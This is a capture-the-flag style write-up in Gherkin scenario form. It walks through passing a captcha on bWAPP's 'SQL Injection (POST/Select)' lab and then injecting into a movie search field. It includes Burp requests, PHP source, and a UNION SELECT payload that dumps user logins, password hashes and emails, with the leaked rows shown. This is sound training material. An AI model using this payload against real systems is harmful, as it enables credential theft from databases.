# language: en

Feature: SQL Injection Captcha
  From system bWAPP
  From the A1 - Injection Category
  With Low security level

Background:
  Given I am running Debian Stretch GNU/Linux kernel 4.9.0-6-amd64
  And I am using Firefox 52.7.3 (64-bit)
  And I am running Burp Suite Community edition v1.7.30
  Given the following
  """
  URL: http://localhost/bWAPP/manual_interv.php
  Message: SQL Injection (POST/Select)
  Details:
        - Pass the CAPTCHA before proceeding to here...
        - When I hover the mouse pointer on here, there
        is redirection to sqli_9.php
        - Captcha image which changes after each reload
    Objective: Bypass the captcha or as it's name says, incur
    in manual intervetion to pass it and perform a sql injection
  """

Scenario: SQL Injection
The objective of this challenge is mostly to perform
the sql injection, but in the future there could be
another feature showing how to bypass the captcha
then doing the sql injection.
  Given the captcha displayed in the site
  And I manually input it's value
  And I check the request on Burp
  """
  # Burp Request
  POST /bWAPP/manual_interv.php HTTP/1.1
  Host: 192.168.56.101
  ...
  ...
  Referer: http://192.168.56.101/bWAPP/manual_interv.php
  Cookie: security_level=0; PHPSESSID=0fefbfbe02109ddc2b734fc0cbfc3076
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 31

  captcha_user=ol-x3s&form=submit
  """
  Then I see so far, nothing strange
  When I forward the request a redirection appears
  """
  # Burp Request
  GET /bWAPP/captcha_box.php HTTP/1.1
  Host: 192.168.56.101
  ...
  ...
  Referer: http://192.168.56.101/bWAPP/manual_interv.php
  Cookie: security_level=0; PHPSESSID=0fefbfbe02109ddc2b734fc0cbfc3076
  Connection: close
  ...
  ...
  Upgrade-Insecure-Requests: 1
  """
  Then I see the source code to see if there is something suspicious
  """
  # manual_interv.php
  111    <p><iframe src="captcha_box.php" scrolling="no" \
    frameborder="0" height="70" width="350"></iframe></p>
  112
  113    <p><label for="captcha_user">Re-enter CAPTCHA:</label><br />
  114    <input type="text" id="captcha_user" name="captcha_user" \
    value="" autocomplete="off" /></p>
  115
  116    <button type="submit" name="form" value="submit">Proceed</button>

  # captcha_box.php
  40  <td><img src="captcha.php"></iframe></td>
  41  <td><input type="button" value="Reload" \
  onClick="window.location.reload()"></td>
  """
  But I an iframe is sending the request to somewhere else
  And this captcha.php will just reload the site if fails
  But if succeed will load the sqli_9.php page
  Then I again, forward the request
  And I see it succeeded
  """
  # Burp Response from captcha_box.php
  HTTP/1.1 200 OK
  Date: Tue, 10 Jul 2018 14:07:57 GMT
  Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/...
  X-Powered-By: PHP/5.2.4-2ubuntu5
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  """
  Then another redirection takes place
  And this time is again from the manual_interv
  """
  # Burp Request redirection after captcha_box execution
  POST /bWAPP/manual_interv.php HTTP/1.1
  Host: 192.168.56.101
  ...
  ...
  Referer: http://192.168.56.101/bWAPP/manual_interv.php
  Content-Length: 31

  captcha_user=k8qf-U&form=submit
  """
  Then I check again at the source code to see what happens
  """
  # manual_interv.php
  29  if(isset($_POST["form"]) && isset($_SESSION["captcha"]))
  30  {
  31    if($_POST["captcha_user"] == $_SESSION["captcha"])
  32    {
  33      $_SESSION["manual_interv"] = 1;
  35      header("Location: sqli_9.php");
  37      exit;
  38    }
  """
  When passes all the checks, it will send a header, stating the new location
  And that's what exactly happens after checking the response previously sent
  """
  # Burp Response redirection after captcha_box execution
  HTTP/1.1 302 Found
  Date: Tue, 10 Jul 2018 14:08:09 GMT
  Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5
  X-Powered-By: PHP/5.2.4-2ubuntu5
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Pragma: no-cache
  Location: sqli_9.php
  Content-Length: 0
  Connection: close
  Content-Type: text/html

  # Code 302, is the common way to perform a URL redirection
  # There is even the header: {Location: sqli_9.php }
  """
  And finally I got the page I was looking for
  And it seems it got to input a movie name to get a response
  But I see that in this input I can perform the SQL injection
  Then I craft a query
  """
  # Injection Query
  0' UNION SELECT id,login,password,email,secret,activated,admin FROM users#
  """
  And I use it as input
  Then I get the following
  """
  <tr height="30">
    <td>A.I.M.</td>
    <td align="center">6885858486f31043e5839c735d99457f045affd0</td>
    <td>A.I.M. or Authentication Is Missing</td>
    <td align="center">bwapp-aim@mailinator.com</td>
    <td align="center"><a href="http://www.imdb.com/title/1" \
    target="_blank">Link</a></td>
  </tr>

  <tr height="30">
    <td>bee</td>
    <td align="center">6885858486f31043e5839c735d99457f045affd0</td>
    <td>Any bugs?</td>
    <td align="center">bwapp-bee@mailinator.com</td>
    <td align="center"><a href="http://www.imdb.com/title/1" \
    target="_blank">Link</a></td>
  </tr>
  """
  And I got data leaked!
